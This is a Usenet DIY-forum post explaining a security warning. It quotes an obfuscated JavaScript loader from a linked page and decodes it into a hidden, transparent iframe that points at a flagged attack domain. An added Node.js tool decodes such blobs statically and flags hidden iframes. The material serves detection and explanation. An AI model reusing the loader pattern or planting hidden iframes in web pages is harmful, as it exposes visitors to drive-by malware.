Thread: wee disposal
Posted to uk.d-i-y
Andy Burns

Cash wrote:

This may be a false positive, but each time I try to access the link that
you give it is blocked by Norton Internet Security in both Outlook Explorer
and Firefox - giving the message that my computer was being 'attacked by'
the HTTP Malicious Toolkit Variant Activity 2.


It contains an obfuscated section of Javascript

<script type="text/javascript">
var kPvOkYUlTEBvLmAPjYUP =
"nd60nd105nd102nd114nd97nd109nd101nd32nd119nd105nd 100nd116nd104nd61nd34nd52nd56nd48nd34nd32nd104nd10 1nd105nd103nd104nd116nd61nd34nd54nd48nd34nd32nd115 nd114nd99nd61nd34nd104nd116nd116nd112nd58nd47nd47n d104nd105nd116nd45nd115nd101nd110nd100nd101nd114nd 115nd46nd99nd110nd47nd102nd105nd110nd100nd47nd105n d110nd46nd99nd103nd105nd63nd49nd50nd34nd32nd115nd1 16nd121nd108nd101nd61nd34nd98nd111nd114nd100nd101n d114nd58nd48nd112nd120nd59nd32nd112nd111nd115nd105 nd116nd105nd111nd110nd58nd114nd101nd108nd97nd116nd 105nd118nd101nd59nd32nd116nd111nd112nd58nd48nd112n d120nd59nd32nd108nd101nd102nd116nd58nd45nd53nd48nd 48nd112nd120nd59nd32nd111nd112nd97nd99nd105nd116nd 121nd58nd48nd59nd32nd102nd105nd108nd116nd101nd114n d58nd112nd114nd111nd103nd105nd100nd58nd68nd88nd73n d109nd97nd103nd101nd84nd114nd97nd110nd115nd102nd11 1nd114nd109nd46nd77nd105nd99nd114nd111nd115nd111nd 102nd116nd46nd65nd108nd112nd104nd97nd40nd111nd112n d97nd99nd105nd116nd121nd61nd48nd41nd59nd32nd45nd10 9nd111nd122nd45nd111nd112nd97nd99nd105n
d116nd121nd58nd48nd34nd62nd60nd47nd105nd102nd114nd 97nd109nd101nd62";
var LQweQmnfGaTqpPFaoZLH = kPvOkYUlTEBvLmAPjYUP.split("nd");
var dNCoADEkcYAnpwSFjFkp = "";
for (var fDfVTkvHKHOnVRcVUgGw = 1;
fDfVTkvHKHOnVRcVUgGw < LQweQmnfGaTqpPFaoZLH.length;
fDfVTkvHKHOnVRcVUgGw++)
{
dNCoADEkcYAnpwSFjFkp +=
String.fromCharCode(LQweQmnfGaTqpPFaoZLH[fDfVTkvHKHOnVRcVUgGw]);
}
document.write(dNCoADEkcYAnpwSFjFkp)</script>

which inserts the following html (without the x's) into the document

<iframe width="480" height="60" style="border: 0px none ; position:
relative; top: 0px; left: -500px; opacity: 0;"
src="http://xxx.hit-senders.cn.xxx/find/in.cgi?12"/>

The frame content seems to be the reported attack site, according to Google.

http://safebrowsing.clients.google.c...enders.cn/find
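
The decoding described in the post above can be reproduced statically, without loading the page in a browser. The following Node.js sketch is an added example, not part of the original post: the function names are illustrative, and the sample blob is constructed here and points at an `example.invalid` host rather than the site from the thread.

```javascript
// Static decoder for "delimiter + decimal char code" obfuscation (added example).
// Nothing is evaluated or written to a DOM; decoded markup is only inspected.

// Decode a blob such as "nd60nd105..." into text. Whitespace introduced by
// line wrapping is dropped; any token that is not a decimal number is rejected.
function decodeCharCodes(blob, delimiter) {
  const tokens = blob.replace(/\s+/g, "").split(delimiter).filter(t => t !== "");
  return tokens.map(t => {
    if (!/^\d{1,5}$/.test(t)) throw new Error("unexpected token: " + t);
    return String.fromCharCode(Number(t));
  }).join("");
}

// Rewrite a URL so it cannot be followed by accident when pasted into a report.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// List iframes in decoded markup and the styling tricks that hide them.
function findHiddenIframes(html) {
  const findings = [];
  const tagRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[0];
    const src = (/\bsrc\s*=\s*["']([^"']*)["']/i.exec(tag) || [])[1] || "";
    const reasons = [];
    if (/opacity\s*[:=]\s*0(?![.\d])/i.test(tag)) reasons.push("zero opacity");
    if (/\b(?:left|top)\s*:\s*-\d+/i.test(tag)) reasons.push("negative offset");
    if (/display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag)) reasons.push("not displayed");
    findings.push({ src: defang(src), hidden: reasons.length > 0, reasons });
  }
  return findings;
}

// Constructed sample (assumption, not the blob from the post): harmless markup
// encoded the same way, then wrapped every 50 characters like a mangled archive copy.
const SAMPLE_HTML = '<iframe width="480" height="60" ' +
  'src="http://tracker.example.invalid/in.cgi?1" ' +
  'style="position:relative; left:-500px; opacity:0"></iframe>';
const SAMPLE_BLOB = Array.from(SAMPLE_HTML, c => "nd" + c.charCodeAt(0)).join("");
const WRAPPED_BLOB = SAMPLE_BLOB.replace(/(.{50})/g, "$1 \n");

console.log(findHiddenIframes(decodeCharCodes(WRAPPED_BLOB, "nd")));
```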